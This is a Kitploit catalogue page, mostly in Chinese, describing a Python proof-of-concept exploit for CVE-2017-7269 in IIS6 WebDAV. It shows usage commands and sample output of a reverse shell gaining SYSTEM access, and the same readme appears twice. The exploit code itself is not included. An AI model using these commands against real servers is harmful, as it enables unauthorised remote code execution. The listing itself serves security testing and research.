Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-7269 — 是一个 PoC 工具,演示针对 IIS6 的 WebDAV 组件中一个已知漏洞的利用。 | Kitploit
工具/GitHubGitHub/geniuszly/cve-2017-7269
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubgeniuszly/cve-2017-7269

CVE-2017-7269

是一个 PoC 工具,演示针对 IIS6 的 WebDAV 组件中一个已知漏洞的利用。

查看仓库
421年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

EN

GenWebDavIISExploit 是一个 PoC 工具,演示针对 IIS6 WebDAV 组件中一个已知漏洞的利用。该工具仅为教育和研究目的而设计,用于展示如何利用该漏洞在远程服务器上执行任意代码。

免责声明

本项目仅供教育目的使用。请负责任地使用此工具,并且仅在您拥有或获得明确测试许可的系统上使用。未经授权访问计算机系统是非法的。

功能特性

  • 在易受攻击的 IIS6 WebDAV 服务器上执行远程代码。
  • 使用用户指定的反向 IP 和端口动态生成攻击载荷。
  • 易于使用的命令行界面,可快速进行漏洞利用。

前提条件

  • Python 3.x:确保您的系统已安装 Python 3。
  • 网络访问:能够连接到目标机器的 IP 地址和端口。

使用方法

命令行参数

  • 目标 IP:目标 IIS6 WebDAV 服务器的 IP 地址。
  • 目标端口:WebDAV 服务运行的端口号(通常为 80)。
  • 反向 IP:您的 IP 地址,反向 Shell 应连接到此地址。
  • 反向端口:您系统上用于接收反向 Shell 的端口号。

示例

root@kitploit:~
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>

使用示例

root@kitploit:~
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

输出示例

root@kitploit:~
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...

[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Настройка IP Windows

   Адаптер Ethernet Local Area Connection:
      DNS-суффикс подключения . . . . . : example.local
      IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
      Маска подсети . . . . . . . . . . : 255.255.255.0
      Основной шлюз . . . . . . . . . . : 192.168.1.1
    

注意事项

  • 确保您在指定的反向端口上运行监听器,以捕获传入的反向 Shell。
  • 仅在获得授权的系统上使用此工具来测试漏洞。

RU

GenWebDavIISExploit 是一个 PoC 工具,演示针对 IIS6 上 WebDAV 组件中一个已知漏洞的利用。该工具为教育和研究目的而创建,用于展示该漏洞如何被利用以在远程服务器上执行任意代码。

免责声明

本项目仅用于教育目的。请负责任地使用此工具,并且仅在您拥有或获得明确测试许可的系统上使用。未经授权访问计算机系统是非法的。

功能特性

  • 在易受攻击的 IIS6 WebDAV 服务器上执行远程代码。
  • 生成动态攻击载荷,并指定反向连接的 IP 和端口。
  • 简单的命令行界面,便于快速使用。

前提条件

  • Python 3.x:确保您已安装 Python 3。
  • 网络访问:能够连接到目标机器的 IP 地址和端口。

使用方法

命令行参数

  • 目标 IP:目标 IIS6 WebDAV 服务器的 IP 地址。
  • 目标端口:WebDAV 服务运行的端口号(通常为 80)。
  • 反向 IP:您的 IP 地址,反向连接应建立到此地址。
  • 反向端口:您系统上用于接收反向连接的端口号。

示例

root@kitploit:~
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>

使用示例

root@kitploit:~
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

输出示例

root@kitploit:~
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...

[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Настройка IP Windows

   Адаптер Ethernet Local Area Connection:
      DNS-суффикс подключения . . . . . : example.local
      IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
      Маска подсети . . . . . . . . . . : 255.255.255.0
      Основной шлюз . . . . . . . . . . : 192.168.1.1
    

注意事项

  • 确保您在指定的反向端口上运行监听器,以捕获传入的反向连接。
  • 仅在获得授权的系统上使用此工具来检查漏洞。
下载工具